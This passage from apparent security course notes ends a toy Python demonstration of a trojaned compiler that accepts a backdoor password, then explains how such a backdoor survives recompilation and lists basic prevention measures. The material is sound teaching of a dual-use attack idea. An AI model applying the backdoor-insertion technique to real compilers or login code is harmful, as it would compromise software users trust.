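    print("clean compiler, backdoor password :", login_clean("alice", BACKDOOR_PASSWORD))
    print("trojan compiler, backdoor password:", login_trojan("alice", BACKDOOR_PASSWORD))
    print("outputs differ                    :", compiler_outputs_differ(LOGIN_SOURCE))
```

The same loop is what makes the attack spread: if the compiler's own source is compiled by the trojaned compiler, the insertion logic can be re-inserted into the new compiler binary even after it is removed from the compiler's source, which is why the defence has to compare binaries produced by independent compilers rather than trust the source.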
2.7.7 Simple Attack Prevention Methods
- Individual screening: check the background of individuals who are allowed to access the system, since an insider may introduce an attack
- Physical control: secure the facilities with an enclosed environment
- Care in operation: set up and follow security procedures
2.8 References
E. Amoroso, Chapters 1-5